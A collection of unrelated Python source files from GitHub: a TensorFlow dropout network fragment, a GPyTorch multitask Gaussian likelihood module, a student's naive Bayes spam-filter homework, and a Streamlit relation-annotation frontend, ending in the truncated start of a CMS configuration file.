Xbatch = X[j*batch_sz:(j*batch_sz+batch_sz)]
Ybatch = Y[j*batch_sz:(j*batch_sz+batch_sz)]
sess.run(train_op, feed_dict={inputs: Xbatch,
labels: Ybatch})
if j % print_every == 0:
c = sess.run(test_cost, feed_dict={inputs: Xvalid,
labels: Yvalid})
p = sess.run(prediction, feed_dict={inputs: Xvalid})
costs.append(c)
e = error_rate(Yvalid, p)
print("i:", i, "j:", j, "nb:", n_batches, "cost:", c,
"error rate:", e)
plt.plot(costs)
plt.show()
def forward(self, X):
# tf.nn.dropout scales inputs by 1/p_keep
# therefore, during test time, we don't have to scale anything
Z = X
'''
Here is the dropout implementation. Tensorflow does the masking for us.
Inputs (X) dropout is done first, outside the loop. Then dropout is
performed on the outputs, before they become inputs to the next layer.
This is a bit different from the theano code. Haven't thought about
why he did this hard enough yet. I believe the outcome is the same, but
the theano implementation is cleaner since it is all within the loop.
'''
Z = tf.nn.dropout(Z, self.dropout_rates[0])
for h, p in zip(self.hidden_layers, self.dropout_rates[1:]):
Z = h.forward(Z)
Z = tf.nn.dropout(Z, p)
return tf.matmul(Z, self.W) + self.b # logits of final layer.
def forward_test(self, X):
'''
Note that inputs aren't scaled here, the dropout function already
took care of that during training (see LP's note above).
'''
Z = X
for h in self.hidden_layers:
Z = h.forward(Z)
return tf.matmul(Z, self.W) + self.b
def predict(self, X):
pY = self.forward_test(X)
return tf.argmax(pY, 1)
def error_rate(p, t):
return np.mean(p != t)
def relu(a):
return a * (a > 0)
def main():
# step 1: get the data and define all the usual variables
Xtrain, Xtest, Ytrain, Ytest = get_normalized_data()
ann = ANN([500, 300], [0.8, 0.5, 0.5])
ann.fit(Xtrain, Ytrain, Xtest, Ytest)
if __name__ == '__main__':
main()
| geoffder/learning | LP_deep_learning_2/LP_dropout_tensorflow.py | LP_dropout_tensorflow.py | py | 7,126 | python | en | code | 0 | github-code | 50 |
23445476397 | #!/usr/bin/env python3
import torch
from torch.nn.functional import softplus
from .. import settings
from ..functions import add_diag
from ..lazy import (
BlockDiagLazyTensor,
DiagLazyTensor,
KroneckerProductLazyTensor,
MatmulLazyTensor,
NonLazyTensor,
RootLazyTensor,
)
from ..likelihoods import Likelihood, _GaussianLikelihoodBase
from ..utils.deprecation import _deprecate_kwarg
from ..utils.transforms import _get_inv_param_transform
from .noise_models import MultitaskHomoskedasticNoise
class _MultitaskGaussianLikelihoodBase(_GaussianLikelihoodBase):
"""Base class for multi-task Gaussian Likelihoods, supporting general heteroskedastic noise models. """
def __init__(self, num_tasks, noise_covar, rank=0, task_correlation_prior=None, batch_size=1):
"""
Args:
num_tasks (int):
Number of tasks.
noise_covar (:obj:`gpytorch.module.Module`):
A model for the noise covariance. This can be a simple homoskedastic noise model, or a GP
that is to be fitted on the observed measurement errors.
rank (int):
The rank of the task noise covariance matrix to fit. If `rank` is set to 0, then a diagonal covariance
matrix is fit.
task_correlation_prior (:obj:`gpytorch.priors.Prior`):
Prior to use over the task noise correlation matrix. Only used when `rank` > 0.
batch_size (int):
Number of batches.
"""
super().__init__(noise_covar=noise_covar)
if rank != 0:
self.register_parameter(
name="task_noise_corr_factor", parameter=torch.nn.Parameter(torch.randn(batch_size, num_tasks, rank))
)
self.register_parameter(
name="task_noise_corr_diag", parameter=torch.nn.Parameter(torch.ones(batch_size, num_tasks))
)
if task_correlation_prior is not None:
self.register_prior(
"MultitaskErrorCorrelationPrior", task_correlation_prior, lambda: self._eval_corr_matrix
)
elif task_correlation_prior is not None:
raise ValueError("Can only specify task_correlation_prior if rank>0")
self.num_tasks = num_tasks
self.rank = rank
def _eval_corr_matrix(self):
corr_factor = self.task_noise_corr_factor.squeeze(0)
corr_diag = self.task_noise_corr_diag.squeeze(0)
M = corr_factor.matmul(corr_factor.transpose(-1, -2))
idx = torch.arange(M.shape[-1], dtype=torch.long, device=M.device)
M[..., idx, idx] += corr_diag
sem_inv = 1 / torch.diagonal(M, dim1=-2, dim2=-1).sqrt().unsqueeze(-1)
return M * sem_inv.matmul(sem_inv.transpose(-1, -2))
def forward(self, input, *params):
"""
Adds the task noises to the diagonal of the covariance matrix of the supplied
:obj:`gpytorch.distributions.MultivariateNormal` or :obj:`gpytorch.distributions.MultitaskMultivariateNormal`,
in case of `rank` == 0. Otherwise, adds a rank `rank` covariance matrix to it.
This scales the task correlations appropriately by the variances at the different points provided
by the noise variance model (evalutated at the provided params)
"""
mean, covar = input.mean, input.lazy_covariance_matrix
batch_shape, n = covar.shape[:-2], covar.shape[-1] // self.num_tasks
if len(batch_shape) > 1:
raise NotImplementedError("Batch shapes with dim > 1 not yet supported for MulitTask Likelihoods")
# compute the noise covariance
if len(params) > 0:
shape = None
else:
shape = mean.shape if len(mean.shape) == 1 else mean.shape[:-1]
noise_covar = self.noise_covar(*params, shape=shape)
if hasattr(self, "task_noise_corr_factor"):
# if rank > 0, compute the task correlation matrix
# TODO: This is inefficient, change repeat so it can repeat LazyTensors w/ multiple batch dimensions
task_corr = self._eval_corr_matrix()
exp_shape = batch_shape + torch.Size([n]) + task_corr.shape[-2:]
if len(batch_shape) == 1:
task_corr = task_corr.unsqueeze(-3)
task_corr_exp = NonLazyTensor(task_corr.expand(exp_shape))
noise_sem = noise_covar.sqrt()
task_covar_blocks = MatmulLazyTensor(MatmulLazyTensor(noise_sem, task_corr_exp), noise_sem)
else:
# otherwise tasks are uncorrelated
task_covar_blocks = noise_covar
if len(batch_shape) == 1:
# TODO: Properly support general batch shapes in BlockDiagLazyTensor (no shape arithmetic)
tcb_eval = task_covar_blocks.evaluate()
task_covar = BlockDiagLazyTensor(
NonLazyTensor(tcb_eval.view(-1, *tcb_eval.shape[-2:])), num_blocks=tcb_eval.shape[0]
)
else:
task_covar = BlockDiagLazyTensor(task_covar_blocks)
return input.__class__(mean, covar + task_covar)
def variational_log_probability(self, input, target):
raise NotImplementedError("Variational inference with Multitask Gaussian likelihood is not yet supported")
class MultitaskGaussianLikelihood(_MultitaskGaussianLikelihoodBase):
"""
A convenient extension of the :class:`gpytorch.likelihoods.GaussianLikelihood` to the multitask setting that allows
for a full cross-task covariance structure for the noise. The fitted covariance matrix has rank `rank`.
If a strictly diagonal task noise covariance matrix is desired, then rank=0 should be set. (This option still
allows for a different `log_noise` parameter for each task.). This likelihood assumes homoskedastic noise.
Like the Gaussian likelihood, this object can be used with exact inference.
Note: This currently does not yet support batched training and evaluation. If you need support for this,
use MultitaskGaussianLikelihoodKronecker for the time being.
"""
def __init__(
self,
num_tasks,
rank=0,
task_correlation_prior=None,
batch_size=1,
noise_prior=None,
param_transform=softplus,
inv_param_transform=None,
**kwargs
):
"""
Args:
num_tasks (int): Number of tasks.
rank (int): The rank of the task noise covariance matrix to fit. If `rank` is set to 0,
then a diagonal covariance matrix is fit.
task_correlation_prior (:obj:`gpytorch.priors.Prior`): Prior to use over the task noise correlaton matrix.
Only used when `rank` > 0.
"""
task_correlation_prior = _deprecate_kwarg(
kwargs, "task_prior", "task_correlation_prior", task_correlation_prior
)
noise_covar = MultitaskHomoskedasticNoise(
num_tasks=num_tasks,
noise_prior=noise_prior,
batch_size=batch_size,
param_transform=param_transform,
inv_param_transform=inv_param_transform,
)
super().__init__(
num_tasks=num_tasks,
noise_covar=noise_covar,
rank=rank,
task_correlation_prior=task_correlation_prior,
batch_size=batch_size,
)
self._param_transform = param_transform
self._inv_param_transform = _get_inv_param_transform(param_transform, inv_param_transform)
self.register_parameter(name="raw_noise", parameter=torch.nn.Parameter(torch.zeros(batch_size, 1)))
@property
def noise(self):
return self._param_transform(self.raw_noise)
@noise.setter
def noise(self, value):
self._set_noise(value)
def _set_noise(self, value):
if not torch.is_tensor(value):
value = torch.tensor(value)
self.initialize(raw_noise=self._inv_param_transform(value))
def forward(self, input, *params):
mvn = super().forward(input, *params)
mean, covar = mvn.mean, mvn.lazy_covariance_matrix
noise = self.noise
if covar.ndimension() == 2:
if settings.debug.on() and noise.size(0) > 1:
raise RuntimeError("With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution.")
noise = noise.squeeze(0)
covar = add_diag(covar, noise)
return input.__class__(mean, covar)
class MultitaskGaussianLikelihoodKronecker(_MultitaskGaussianLikelihoodBase):
"""
A convenient extension of the :class:`gpytorch.likelihoods.GaussianLikelihood` to the multitask setting that allows
for a full cross-task covariance structure for the noise. The fitted covariance matrix has rank `rank`.
If a strictly diagonal task noise covariance matrix is desired, then rank=0 should be set. (This option still
allows for a different `noise` parameter for each task.)
Like the Gaussian likelihood, this object can be used with exact inference.
Note: This Likelihood is scheduled to be deprecated and replaced by an improved version of
`MultitaskGaussianLikelihood`. Use this only for compatibility with batched Multitask models.
"""
def __init__(
self,
num_tasks,
rank=0,
task_prior=None,
batch_size=1,
noise_prior=None,
param_transform=softplus,
inv_param_transform=None,
**kwargs
):
"""
Args:
num_tasks (int): Number of tasks.
rank (int): The rank of the task noise covariance matrix to fit. If `rank` is set to 0,
then a diagonal covariance matrix is fit.
task_prior (:obj:`gpytorch.priors.Prior`): Prior to use over the task noise covariance matrix if
`rank` > 0, or a prior over the log of just the diagonal elements, if `rank` == 0.
"""
noise_prior = _deprecate_kwarg(kwargs, "log_noise_prior", "noise_prior", noise_prior)
super(Likelihood, self).__init__()
self._param_transform = param_transform
self._inv_param_transform = _get_inv_param_transform(param_transform, inv_param_transform)
self.register_parameter(name="raw_noise", parameter=torch.nn.Parameter(torch.zeros(batch_size, 1)))
if rank == 0:
self.register_parameter(
name="raw_task_noises", parameter=torch.nn.Parameter(torch.zeros(batch_size, num_tasks))
)
if task_prior is not None:
raise RuntimeError("Cannot set a `task_prior` if rank=0")
else:
self.register_parameter(
name="task_noise_covar_factor", parameter=torch.nn.Parameter(torch.randn(batch_size, num_tasks, rank))
)
if task_prior is not None:
self.register_prior("MultitaskErrorCovariancePrior", task_prior, self._eval_covar_matrix)
self.num_tasks = num_tasks
self.rank = rank
@property
def noise(self):
return self._param_transform(self.raw_noise)
@noise.setter
def noise(self, value):
self._set_noise(value)
def _set_noise(self, value):
self.initialize(raw_noise=self._inv_param_transform(value))
def _eval_covar_matrix(self):
covar_factor = self.task_noise_covar_factor
noise = self.noise
D = noise * torch.eye(self.num_tasks, dtype=noise.dtype, device=noise.device)
return covar_factor.matmul(covar_factor.transpose(-1, -2)) + D
def forward(self, input, *params):
"""
Adds the task noises to the diagonal of the covariance matrix of the supplied
:obj:`gpytorch.distributions.MultivariateNormal` or :obj:`gpytorch.distributions.MultitaskMultivariateNormal`,
in case of `rank` == 0. Otherwise, adds a rank `rank` covariance matrix to it.
To accomplish this, we form a new :obj:`gpytorch.lazy.KroneckerProductLazyTensor` between :math:`I_{n}`,
an identity matrix with size equal to the data and a (not necessarily diagonal) matrix containing the task
noises :math:`D_{t}`.
We also incorporate a shared `noise` parameter from the base
:class:`gpytorch.likelihoods.GaussianLikelihood` that we extend.
The final covariance matrix after this method is then :math:`K + D_{t} \otimes I_{n} + \sigma^{2}I_{nt}`.
Args:
input (:obj:`gpytorch.distributions.MultitaskMultivariateNormal`): Random variable whose covariance
matrix is a :obj:`gpytorch.lazy.LazyTensor` we intend to augment.
Returns:
:obj:`gpytorch.distributions.MultitaskMultivariateNormal`: A new random variable whose covariance
matrix is a :obj:`gpytorch.lazy.LazyTensor` with :math:`D_{t} \otimes I_{n}` and :math:`\sigma^{2}I_{nt}`
added.
"""
mean, covar = input.mean, input.lazy_covariance_matrix
if self.rank == 0:
task_noises = self._param_transform(self.raw_task_noises)
if covar.ndimension() == 2:
if settings.debug.on() and task_noises.size(0) > 1:
raise RuntimeError(
"With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution."
)
task_noises = task_noises.squeeze(0)
task_var_lt = DiagLazyTensor(task_noises)
dtype, device = task_noises.dtype, task_noises.device
else:
task_noise_covar_factor = self.task_noise_covar_factor
if covar.ndimension() == 2:
if settings.debug.on() and task_noise_covar_factor.size(0) > 1:
raise RuntimeError(
"With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution."
)
task_noise_covar_factor = task_noise_covar_factor.squeeze(0)
task_var_lt = RootLazyTensor(task_noise_covar_factor)
dtype, device = task_noise_covar_factor.dtype, task_noise_covar_factor.device
if covar.ndimension() == 2:
eye_lt = DiagLazyTensor(torch.ones(covar.size(-1) // self.num_tasks, dtype=dtype, device=device))
else:
eye_lt = DiagLazyTensor(
torch.ones(covar.size(0), covar.size(-1) // self.num_tasks, dtype=dtype, device=device)
)
# Make sure the batch sizes are going to match
if task_var_lt.size(0) == 1:
task_var_lt = task_var_lt.repeat(eye_lt.size(0), 1, 1)
covar_kron_lt = KroneckerProductLazyTensor(eye_lt, task_var_lt)
covar = covar + covar_kron_lt
noise = self.noise
if covar.ndimension() == 2:
if settings.debug.on() and noise.size(0) > 1:
raise RuntimeError("With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution.")
noise = noise.squeeze(0)
covar = add_diag(covar, noise)
return input.__class__(mean, covar)
| KhurramPirov/Log-Determinants-Estimator | demo/FLOVE/likelihoods/multitask_gaussian_likelihood.py | multitask_gaussian_likelihood.py | py | 15,064 | python | en | code | 0 | github-code | 50 |
28887970366 | ############################################################
# CMPSC442: Homework 5
############################################################
student_name = "John_Hofbauer"
############################################################
# Imports
# What modules can I import? -- collections, itertools, math, random, queue, email, os, re, string, copy, os
############################################################
# Include your imports here, if any are used.
import os
from email import message_from_file, iterators
from math import log, exp
from collections import Counter, OrderedDict
############################################################
# Section 1: Spam Filter
############################################################
def load_tokens(email_path):
# Open the file
file = open(email_path, "r", encoding="utf-8")
# Create the list of tokens
message = message_from_file(file)
tokens = [token for lines in iterators.body_line_iterator(message) for token in lines.split()]
# Close the file
# Return a list of the tokens from the file.
file.close(); return tokens
def log_probs(email_paths, smoothing):
# Create a list of the tokens
tokens = [token for email in email_paths for token in load_tokens(email)]
tokenCountWithRepeats = len(tokens)
# Create a dict for the count of each token.
tokenCount = Counter(tokens)
tokenCountWithoutRepeats = len(tokenCount)+1
# create the probability dict, then apply smothing.
# CMPSC 442, Wk 8, Mtg 22, Seg 2. FROM SLIDE 20 Mitigation: calculate in log space. Given log(xy) = log(x) + log(y)
# preform all computaions by summing log of probabilites rather than multiplying prvabilits.
tokenProbabilitys = {token:(log((amount+smoothing)/((tokenCountWithRepeats)+(smoothing*(tokenCountWithoutRepeats))))) for token, amount in tokenCount.items()}
tokenProbabilitys["<UNK>"] = log(smoothing/(tokenCountWithRepeats+(smoothing*(tokenCountWithoutRepeats))))
# Return the dict of prbabilites.
return tokenProbabilitys
class SpamFilter(object):
def __init__(self, spam_dir, ham_dir, smoothing):
# Get a list of all the files within the dirctory. keeping the dictinary comprehention sepreate, increasses runtime.
spamFiles = [(spam_dir+'/'+i) for i in os.listdir(spam_dir)]
hamFiles = [(ham_dir+'/'+i) for i in os.listdir(ham_dir)]
spamFileAmount = len(spamFiles)
hamFileAmount = len(hamFiles)
# Create the dict for the index of all spam and ham emails.
self.Pspam = log_probs(spamFiles, smoothing)
self.Pham = log_probs(hamFiles, smoothing)
# Calculate the probabilities.
self.spamLogProbability = spamFileAmount / (spamFileAmount + hamFileAmount)
self.hamLogProbability = hamFileAmount / (spamFileAmount + hamFileAmount)
def is_spam(self, email_path):
# Create a dict for the count of each token.
tokenCount = Counter([token for token in load_tokens(email_path)])
# Calculate the projuct of each token from the email, found within the data set.
spamProduct = sum([self.Pspam[token] if token in self.Pspam else self.Pspam["<UNK>"] for token, count in tokenCount.items()])
hamProduct = sum([self.Pham[token] if token in self.Pham else self.Pham["<UNK>"] for token, count in tokenCount.items()])
# return a Boolen stating weather it is more probable that the email is spam or ham.
return log(self.spamLogProbability)+spamProduct > log(self.hamLogProbability)+hamProduct
def most_indicative_spam(self, n):
# Calculate the token probabilites using log (P(w|spam)/P(w))
tokenProbabilitys = {token:count-log((exp(self.Pham[token])+exp(self.Pspam[token]))) for token, count in self.Pham.items() if (token in self.Pspam)}
#print('table 1', [i for i in tokenProbabilitys.items()][:10])
# Return the list of keys, sorted by their values, then trunkated to only return the first n amount
return [token[0] for token in sorted(tokenProbabilitys.items(), key=lambda x: x[1])][:n]
def most_indicative_ham(self, n):
# Calculate the token probabilites using log (P(w|spam)/P(w))
tokenProbabilitys = {token:count-log((exp(self.Pspam[token])+exp(self.Pham[token]))) for token, count in self.Pspam.items() if (token in self.Pham)}
# Return the list of keys, sorted by their values, then trunkated to only return the first n amount
return [token[0] for token in sorted(tokenProbabilitys.items(), key=lambda x: x[1])][:n]
############################################################
# Test Code
############################################################
"""
import time
startTime = time.time()
# 1
ham_dir="homework5_data/train/ham/"
print(load_tokens(ham_dir+"ham1")[200:204])
print(load_tokens(ham_dir+"ham2")[110:114])
spam_dir="homework5_data/train/spam/"
print(load_tokens(spam_dir+"spam1")[1:5])
print(load_tokens(spam_dir+"spam2")[:4])
# 2
paths=["homework5_data/train/ham/ham%d"%i for i in range(1,11)]
p=log_probs(paths,1e-5)
print(p["the"])
print(p["line"])
paths=["homework5_data/train/spam/spam%d"%i for i in range(1,11)]
p=log_probs(paths,1e-5)
print(p["Credit"])
print(p["<UNK>"])
# 3
# 4
sf=SpamFilter("homework5_data/train/spam","homework5_data/train/ham",1e-5)
print(sf.is_spam("homework5_data/train/spam/spam1"))
print(sf.is_spam("homework5_data/train/spam/spam2" ))
sf = SpamFilter("homework5_data/train/spam", "homework5_data/train/ham", 1e-5)
print(sf.is_spam("homework5_data/train/ham/ham1"))
print(sf.is_spam("homework5_data/train/ham/ham2"))
# 5
sf=SpamFilter("homework5_data/train/spam", "homework5_data/train/ham",1e-5)
print(sf.most_indicative_spam(5))
sf=SpamFilter("homework5_data/train/spam", "homework5_data/train/ham",1e-5)
print(sf.most_indicative_ham(5))
print(time.time() - startTime)
"""
############################################################
# Section 2: Feedback
############################################################
feedback_question_1 = """
20 Hours - coding the assinment was eaiser that understanding why the
result was what it should be.
"""
feedback_question_2 = """
Understanding the effects of smothing. (I know we went through it in class
but actualy using it, is diffrent.)
"""
feedback_question_3 = """
Ehh, it was better than the last assigment.
I would have started with this assignment, since the order of the hw assignment
has no real connection in my opinion.
"""
| JohnHofbauer/Artificial-Intelligence | Assignment 5/homework5_jch5769.py | homework5_jch5769.py | py | 6,509 | python | en | code | 0 | github-code | 50 |
10759963601 | import generic
import streamlit as st
import spacy_streamlit
from itertools import combinations
import json
import sys
def show_layout(type='page',data=None,layout=[.1,.6]):
cols = st.columns(layout)
returns = []
if type == 'page':
data = ['Prev Page','Next Page']
for col_idx, col in enumerate(cols):
with col:
# if type == 'page':
# returns.append(st.button(data[col_idx],key=data[col_idx].lower().replace(' ','_')))
if data:
returns.append(st.button(data[col_idx],key=data[col_idx].lower().replace(' ','_')))
return returns
def save_data(update_status,iter_obj,path=None):
if update_status or path:
if not path:
filename = 'sample2.jsonl'
elif path.name.find('json'):
filename = path.name
else:
filename = f"{path.name[:path.name.rfind('.')]}.jsonl"
# else:
# filename = f"{path.name[:path.name.rfind('.')]}_out.jsonl"
if sys.platform != 'linux':
filename = f'assets/{filename}'
if sys.platform == 'linux':
json_str = '\n'.join(iter_obj)
jsonl = list(map(lambda x:json.loads(x),iter_obj))
save = st.download_button('Download',key='save',data=json_str,file_name=path)
else:
overwrite, save_copy = show_layout(type='save',data=['Overwrite','Save as'])
if overwrite or save_copy:
if save_copy and path:
filename = f"{path.name[:path.name.rfind('.')]}_out.jsonl"
with open(filename, "w", encoding="utf-8") as jsonfile:
for entry in iter_obj:
# json.dump(entry,jsonfile)
jsonfile.write(entry)
jsonfile.write('\n')
def process_spans(rel_dict,spans,spans_pos,relations,prev_rel):
st.subheader('Select span elements!')
sel_spans = st.multiselect('Entities',key='multi_spans',options=[f'{text} ({idx+1})' if len(tokens_start)>1 else text for text, tokens_start in spans_pos.items() for idx in range(len(tokens_start))],on_change=generic.update_session,kwargs={'session_key':'radio_spans','value':None})
if len(sel_spans)>=2:
_, _, texts_list, rel_idx, rel_str = display_sidebar(rel_dict=rel_dict,spans=sel_spans,spans_pos=spans_pos)
if rel_idx != None:
show_summary(texts_list,rel_str,prev_rel[rel_idx])
if len(rel_str) > 0:
# generic.update_session(session_key='relations',key=rel_idx,value=rel_str)
return True
return None
def process_edit(edit_spans,text):
rerun = False
spans_sets = []
if edit_spans:
st.subheader('Modify span entities!')
tokens_sets = [{'text':tokens['text'],'start':tokens['start'],'token_start':tokens['id'],'ws':tokens['ws']} for tokens in text['tokens']]
# spans_sets = []
iter_idx = 0
st.session_state.tokens_sets, st.session_state.span_iter_idx = tokens_sets, iter_idx
if edit_spans == 'Reset': # Resetting previous spans and relations
while tokens_sets and iter_idx >= 0:
span_start = st.selectbox(f'Starting token (Index: {iter_idx})',key=f'span_start_{iter_idx}',options=[None]+list(map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets)))
if span_start:
tokens_list = [token for token in tokens_sets if token['token_start']>=int(span_start[:span_start.find(':')])]
span_end = st.selectbox(f'Ending token (Index: {iter_idx})',key=f'span_end_{iter_idx}',options=map(lambda x:f"{x['token_start']}: {x['text']}",tokens_list),on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
span_multisel = [span_start,span_end]
text, spans_sets, tokens_sets, iter_idx = generic.process_multisel_span(span_multisel=span_multisel,text=text,spans_sets=spans_sets,tokens_sets=tokens_sets,type=edit_spans,iter_idx=iter_idx)
else:
break
# span_multisels = st.multiselect(f'Span (Index: {iter_idx})',key=f'span_{iter_idx}',options=map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets))#,on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
# text, spans_sets, tokens_sets, iter_idx = generic.process_multisel_span(span_multisel=span_multisels,text=text,spans_sets=spans_sets,tokens_sets=tokens_sets,type=edit_spans,iter_idx=iter_idx)
if len(spans_sets)>1:
update_data = st.sidebar.button('Update session')
if update_data:
generic.update_session(session_key='spans',value=spans_sets)
generic.make_relations(spans=spans_sets,type=edit_spans)
text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
elif edit_spans == 'Modify': # Only changing selected span
span_sel = st.selectbox(f'Span to modify',key='select_span',options=[None]+list(map(lambda x:f"{text['spans'].index(x)}: {x['text']}",text['spans'])))
if span_sel:
iter_idx = int(span_sel[:span_sel.find(':')])
spans_sets, tokens_sets = generic.process_sel_span(span_sel=span_sel,text=text,tokens_sets=tokens_sets,type=edit_spans)
prev_span_range = [spans_sets[iter_idx]['token_start'],spans_sets[iter_idx]['token_end']-1]
# tokens_sets = generic.process_sel_span(span_sel=span_sel,text=text,tokens_sets=tokens_sets)
# span_multisel = st.multiselect('Span',key='multi_span',options=map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets),on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
span_start = st.selectbox(f'Starting token',key='span_start',options=[None]+list(map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets)))
if span_start:
tokens_list = [token for token in tokens_sets if token['token_start']>=int(span_start[:span_start.find(':')])]
span_end = st.selectbox(f'Ending token',key='span_end',options=list(map(lambda x:f"{x['token_start']}: {x['text']}",tokens_list)),on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
span_multisel = [span_start,span_end]
span_range = list(map(lambda x:int(x[:x.find(':')]),span_multisel))
text, spans_sets, tokens_sets, iters = generic.process_multisel_span(span_multisel=span_multisel,text=text,spans_sets=spans_sets,tokens_sets=tokens_sets,type=edit_spans,iter_idx=iter_idx)
if prev_span_range != span_range:
generic.update_session(session_key='spans',key=iter_idx,value=spans_sets[iter_idx])
generic.make_relations(spans=spans_sets[iter_idx],iter_idx=iters,type=edit_spans)
text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
elif edit_spans == 'Remove': # Remove selected span
span_sel = st.selectbox(f'Span to remove',key='remove_span',options=[None]+list(map(lambda x:f"{text['spans'].index(x)}: {x['text']}",text['spans'])))
if span_sel:
iter_idx = int(span_sel[:span_sel.find(':')])
spans_sets, tokens_sets = generic.process_sel_span(span_sel=span_sel,text=text,tokens_sets=tokens_sets,type=edit_spans)
if len(text['spans']) != len(spans_sets):
generic.update_session(session_key='spans',value=spans_sets)
generic.make_relations(spans=spans_sets,type=edit_spans)
text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
rerun = True
return spans_sets, rerun
# return st.session_state.spans, st.session_state.relations
def show_summary(texts_list,new_rel,prev_rel):
st.subheader('Entity Relations Set')
st.markdown(f'Related elements: `{texts_list[1]}` - `{texts_list[2]}`')
st.markdown(f"Previous Relations: `{prev_rel['label']}`")
if new_rel != prev_rel:
st.markdown(f"New Relations: `{new_rel['label']}`")
def show_table(spans_pos):
# st.write(st.session_state.spans)
# st.write(st.session_state.relations)
# st.write(spans_pos)
df_header = f"Entities | Previous Relations \n---|---\n"
df_data = [f"***{generic.get_obj_value(spans_pos,spans['head'],access='value')}*** - ***{generic.get_obj_value(spans_pos,spans['child'],access='value')}*** | `{spans['label']}`" for spans in st.session_state.relations]
df = df_header + '\n'.join(df_data)
st.subheader('Entity Relations for the Entire Set')
st.markdown(df)
st.markdown('\n')
def display_sidebar(rel_dict,spans=None,spans_pos=None):
with st.sidebar:
if not spans and not spans_pos:
st.subheader('Select a file to upload')
upload = st.file_uploader('Upload',type=['txt','jsonl'],key='upload')
json_lines = generic.read_text(upload)
return upload, json_lines, None, None, {}
elif not spans:
st.subheader('Select entities to analyze')
else:
spans_list = list(combinations(spans,2))
# texts = st.selectbox(label='Index - Span', options=[None]+[f'{span_idx}: {span_el[0]} - {span_el[1]}' for span_idx, span_el in enumerate(spans_list)], key='index_span', on_change=generic.update_session, kwargs={'session_key':'category','value':None})
texts = st.selectbox(label='Index: Entity 1 - Entity 2', options=[None]+[f'{span_idx}: {span_el[0]} - {span_el[1]}' for span_idx, span_el in enumerate(spans_list)], key='index_span', on_change=generic.update_session, kwargs={'session_key':'category','value':None})
if texts:
texts_list = texts.replace(':',' -').split(' - ')
rel_span_pos = [generic.get_obj_value(spans_pos,texts_list[1]),generic.get_obj_value(spans_pos,texts_list[2])]
# span_dict = [span for span in st.session_state.relations if span['head']==generic.get_obj_value(spans_pos,texts_list[1]) and span['child']==generic.get_obj_value(spans_pos,texts_list[2])][0]
span_dict = [span for span in st.session_state.relations if span['head']==min(rel_span_pos) and span['child']==max(rel_span_pos)][0]
# span_dict = [span for span in st.session_state.relations if span['head']==texts_pos[0] and span['child']==texts_pos[1]][0]
rel_idx = st.session_state.relations.index(span_dict)
category = st.selectbox(label='Category', options=[None]+list(rel_dict.keys()), key='category')
if category != None:
if category != 'No-rel':
action = st.selectbox(label='Action', options=[None]+list(rel_dict[category].keys()), key='action')
if action:
polarity = st.selectbox(label='Polarity', options=[None]+rel_dict[category][action], key='polarity')
if polarity:
span_dict['label'] = f'{polarity}-{action}'
# return texts_list, rel_idx, span_dict
else:
span_dict['label'] = 'No-rel'
generic.update_session(session_key='relations',key=rel_idx,value=span_dict)
return None, None, texts_list, rel_idx, span_dict
return None, None, None, None, {}
def process_iterator(iter_obj,page_num,rel_dict):
text_idx, line = generic.check_iterator(iter_obj,page_num)
if len(line) > 0:
st.markdown(f'Current Page: `{page_num+1}` of `{len(iter_obj)}`')
text, relations = generic.process_text(text_idx, line)
text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
## NEW - Modify spans
radio_options = [None,'Reset']
if len(text['spans'])>1:
radio_options = [None,'Modify','Reset']
# radio_options.append('Modify')
if len(text['spans'])>2:
radio_options = [None,'Remove','Modify','Reset']
# radio_options.append('Remove')
# edit_spans = st.sidebar.radio('Modify spans',key='radio_spans',options=radio_options)
edit_spans = st.sidebar.selectbox('Modify spans',key='radio_spans',options=radio_options)
spans_sets, rerun = process_edit(edit_spans,text)
if rerun:
st.experimental_rerun()
st.subheader('Text to Annotate!')
text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
# spans_pos = dict((span['text'],span['token_start']) for span in text['spans'])
# spans_pos = [(span['text'],span['token_start']) for span in text['spans']]
iter_obj[st.session_state.page] = json.dumps({'text':st.session_state.text,'spans':st.session_state.spans,'tokens':json.loads(iter_obj[st.session_state.page])['tokens'],'_view_id':'relations','relations':st.session_state.relations,'answer':'accept'})
generic.update_session(session_key='annotation',key='data',value=iter_obj)
spans_pos = dict()
for span in text['spans']:
if spans_pos.get(span['text']):
spans_pos[span['text']].append(span['token_start'])
else:
spans_pos[span['text']] = [span['token_start']]
if spans_sets:
doc, labels = generic.process_displayc({'text':text['text'],'spans':spans_sets})
else:
doc, labels = generic.process_displayc(text)
if labels:
spacy_streamlit.visualize_ner(doc,show_table=False,manual=True,labels=labels,title='')
else:
st.info(text['text'])
show_layout(type='spans',layout=[.2,.3])
sel_rel = st.sidebar.checkbox('Show Relations',key='check_rel')
# if sel_rel and len(spans_pos)>1:
if sel_rel and len(spans_pos)>0 and max(max(map(lambda x:len(x),spans_pos.values())),len(spans_pos))>1:
show_table(spans_pos)
update_status = process_spans(rel_dict=rel_dict,spans=text['spans'],spans_pos=spans_pos,relations=st.session_state.relations,prev_rel=text['relations'])
return update_status
return False
def display_texts(json_lines,pages,rel_dict,page_num=0):
prev_page, next_page, page_num = generic.process_btn(json_lines,pages,page_num)
update_status = process_iterator(json_lines,page_num,rel_dict)
return prev_page, next_page, update_status | staedi/rel_annotate | frontend.py | frontend.py | py | 15,136 | python | en | code | 0 | github-code | 50 |
40212789780 | import FWCore.ParameterSet.Config as cms
vertexRecoBlock = cms.PSet(
